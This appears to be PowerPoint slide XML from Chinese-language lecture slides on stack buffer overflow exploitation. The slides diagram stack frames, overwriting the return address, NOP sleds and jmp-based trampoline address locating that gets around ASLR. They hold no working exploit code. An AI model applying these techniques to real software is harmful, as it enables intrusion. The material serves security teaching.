          <a:xfrm>
            <a:off x="8198356" y="348115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D60880B-79C1-CC4C-584D-7898C4462AF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10044875" y="3935491"/>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52" name="直线箭头连接符 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B1BD373-E826-1592-135F-465FD5F09600}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9776953" y="4096143"/>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7AB8E9B7-CC71-7815-65EE-8CD4E8CE9F9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10043290" y="5628326"/>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54" name="直线箭头连接符 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{597E6197-3A7D-C9BD-2749-3FC06A4383FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9775368" y="5788978"/>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DC5B1396-24BA-7F7E-A170-943AA98387F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8187088" y="389893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2663E32-E920-A979-E3E6-756FC188AD98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8234551" y="3519127"/>
            <a:ext cx="14157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覆盖返回地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="58" name="直线连接符 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5313A6B4-8945-5BD8-40DF-BC754A5BD32A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8198356" y="429869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7A988F60-42F7-66F8-CBC9-96C6F60B9191}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8187085" y="472304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1" name="直线连接符 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE2AE33E-ABD3-21BA-6F34-598EBDD74C63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7776976" y="3700600"/>
            <a:ext cx="409579"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2" name="肘形连接符 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7668EA18-92EF-F387-E2FC-C13BEC65998E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="7177928" y="4288379"/>
            <a:ext cx="1595870" cy="420311"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 99795"/>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5F0E616C-D1F1-A4C3-3456-64623CF5AAE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8751563" y="2664909"/>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64" name="文本框 63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45A99B8D-0B22-799B-836D-ED1ADC3A5848}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8561961" y="3109307"/>
            <a:ext cx="715260"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66" name="直线连接符 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1659D5EC-A782-CC74-197D-9C674D7F6B9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8186555" y="509030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F52DF229-2AFE-C17D-7E4E-7936AD99EFBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8351473" y="5127193"/>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68" name="直线连接符 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7AE939F-863E-C3F2-9AC6-E0DE53C16893}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8198356" y="546574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B7EE9550-C7A9-5080-949F-58C6FB72182E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8350232" y="3929264"/>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
        <p:nvSpPr>
          <p:cNvPr id="70" name="文本框 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1E91CA5-D2AB-E8F1-79D1-008BFDD345EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8350231" y="4353589"/>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
        <p:nvSpPr>
          <p:cNvPr id="71" name="文本框 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACC8A60A-5F84-E41E-18EB-475D38F53C8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8350231" y="4733560"/>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80151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基于跳板指令的地址定位技术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适用情况</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5590"/>
            <a:ext cx="4824536"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有些软件的漏洞存在于某些动态链接库中，它们在进程运行时被动态加载，因而在下一次被重新装载到内存中时，其在内存中的栈帧地址是动态变化的，则植入的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代码在内存中的起始地址也是变化的。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此外，如果在使用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ASLR</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技术的操作系统中，地址会因为引入的随机数每次发生变化。</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方法</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699190"/>
            <a:ext cx="4824536"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此时，需要让覆盖返回地址后新写入的返回地址能够自动定位到</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的起始地址。 </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为了解决这个问题，可以利用</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寄存器的特性实现。</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在函数调用结束后，被调用函数的栈帧被释放，</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寄存器中的栈顶指针指向返回地址在内存高地址方向的相邻位置。可见，通过</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寄存器，可以准确定位返回地址所在的位置。 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="893228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4C808104-E685-A896-E679-DEC56EDE42F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7265403" y="1947109"/>
            <a:ext cx="1428359" cy="349669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基于跳板指令的地址定位技术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C714A08F-EDEF-36B4-60FF-6E08274042A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2208101" y="1947108"/>
            <a:ext cx="1440160" cy="399783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D984D2C6-5074-03E3-572B-AF4914323B82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2528071" y="1594071"/>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5" name="文本框 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80775D09-4BA8-98B5-1E7D-31041EFAE426}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2548609" y="5970766"/>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16" name="直线连接符 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C2485A3-3814-154D-18FB-8BBCA7CAD1AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2219369" y="2337318"/>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2D7E405-181B-3A6A-F48E-31A704B5CE58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2761305" y="1914205"/>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5833C90B-3EF3-B5BD-29DE-92327B392AD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2577286" y="2368927"/>
            <a:ext cx="7216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n</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19" name="直线连接符 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1684BFF-8E64-40D2-62B1-F1D0D1E5BF00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2208099" y="270521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21" name="直线连接符 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{505D0834-4E92-7416-594B-928442AB1F5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2219369" y="306608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6C00C73E-75FC-D65A-EACB-6C8D529BA78C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2219369" y="3459215"/>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244AB94-B9C4-A2AF-2626-F342B1A14B86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4065888" y="3913550"/>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5" name="直线箭头连接符 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41AEC6A0-AA66-DDE4-9BD7-C2CF3A90F27F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3797966" y="4074202"/>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EB0ADFC-DB1A-0CF9-CCE0-AEC27F35FC91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4064303" y="5606385"/>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7" name="直线箭头连接符 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36871274-E1D6-3F38-FBC5-39BE36A2E5AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3796381" y="5767037"/>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4B1BD586-CB16-F3E1-DB2C-9F7B7100D941}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2208101" y="387699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B3878F3-BAA9-B64D-159A-3E314D59DA04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2425476" y="3507827"/>
            <a:ext cx="1005403"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返回地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="文本框 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7AF53A9-4749-215A-49B4-00A460A882BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2471873" y="3913550"/>
            <a:ext cx="926857"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old</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连接符 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8602A362-1993-DC0D-27A2-DA5E2C31232A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2219369" y="427675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933081B-5314-7C71-0949-E0A3FDDE3A07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2372486" y="4325364"/>
            <a:ext cx="112562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局部变量</a:t>
            </a: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连接符 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A80999AF-7ED1-3864-7B48-0253D58802C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2208098" y="4701105"/>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244C621-684A-7A58-95AA-CC6E20E181BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2772576" y="2642968"/>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10EF4CD0-0D53-CC57-2DEF-9B08A5168E93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2582974" y="3087366"/>
            <a:ext cx="715260"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实参</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">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4C8172EA-555B-82A7-EA81-D052E2DD617F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2760775" y="4691302"/>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9" name="直线连接符 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4421A66D-88E5-EF91-DB57-32D936AA3106}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2207568" y="506836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F8D2A63-CFD3-84BE-363A-DD78B03314D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2372486" y="5105252"/>
            <a:ext cx="1132041"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局部变量</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>n</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1" name="直线连接符 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7EA7366-130C-EAF9-C5C8-30F9EB792ACA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2219369" y="544380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4A3351FC-2D6E-3C36-4889-8D64A42CEE2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7254135" y="1947108"/>
            <a:ext cx="1440160" cy="399783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57ABE7C0-7752-BE56-FB2F-D3002D77E1D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7574105" y="1594071"/>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44" name="文本框 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE0EE247-7401-9C18-9209-89E79ABAB0F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7594643" y="5970766"/>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45" name="直线连接符 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B8D88D8-888D-1D18-9E3C-F0DFDF623498}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7265403" y="2337318"/>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01BB5B5B-E026-8A7F-BDBD-7866F7D8CC80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7254133" y="270521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B023B2E-7E2D-7CD3-5997-044DB48CBF93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7265403" y="306608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EBC30912-2C27-8A73-97F5-DF752C87A8AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7265403" y="3459215"/>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FD60880B-79C1-CC4C-584D-7898C4462AF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9110337" y="1947108"/>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52" name="直线箭头连接符 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B1BD373-E826-1592-135F-465FD5F09600}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8842415" y="2107760"/>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7AB8E9B7-CC71-7815-65EE-8CD4E8CE9F9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9110337" y="3116870"/>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54" name="直线箭头连接符 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{597E6197-3A7D-C9BD-2749-3FC06A4383FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8842415" y="3277522"/>
            <a:ext cx="267922" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">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DC5B1396-24BA-7F7E-A170-943AA98387F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7254135" y="387699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2663E32-E920-A979-E3E6-756FC188AD98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7301598" y="3497186"/>
            <a:ext cx="14157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覆盖返回地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="58" name="直线连接符 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5313A6B4-8945-5BD8-40DF-BC754A5BD32A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7265403" y="427675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7A988F60-42F7-66F8-CBC9-96C6F60B9191}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7254132" y="4701105"/>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6" name="直线连接符 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1659D5EC-A782-CC74-197D-9C674D7F6B9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7253602" y="506836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F52DF229-2AFE-C17D-7E4E-7936AD99EFBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7687383" y="5074348"/>
            <a:ext cx="572593" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="non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nop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68" name="直线连接符 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7AE939F-863E-C3F2-9AC6-E0DE53C16893}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7265403" y="544380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ACC8A60A-5F84-E41E-18EB-475D38F53C8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7427753" y="3072410"/>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FB7979AC-F16D-CDFC-3735-D6F7200D92B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9715608" y="3500948"/>
            <a:ext cx="1353535" cy="121067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连接符 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DFE7ECC-0660-9E8D-E5CF-5DF5D2467D0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9715608" y="3913934"/>
            <a:ext cx="1358904"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62F7CE0-2688-47DC-A1C3-E741070C4554}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10206784" y="3510906"/>
            <a:ext cx="333746" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="squar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243A16E9-18E8-ECF8-4A6A-841337ADC11C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9791373" y="3931069"/>
            <a:ext cx="1141030" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="squar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jmp</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err="1">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2" name="直线连接符 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A6B9960-1914-1B33-922D-EBD2218A02D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9729913" y="4320267"/>
            <a:ext cx="1347634"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786C1691-6404-22A7-DC75-6638D58CCD23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
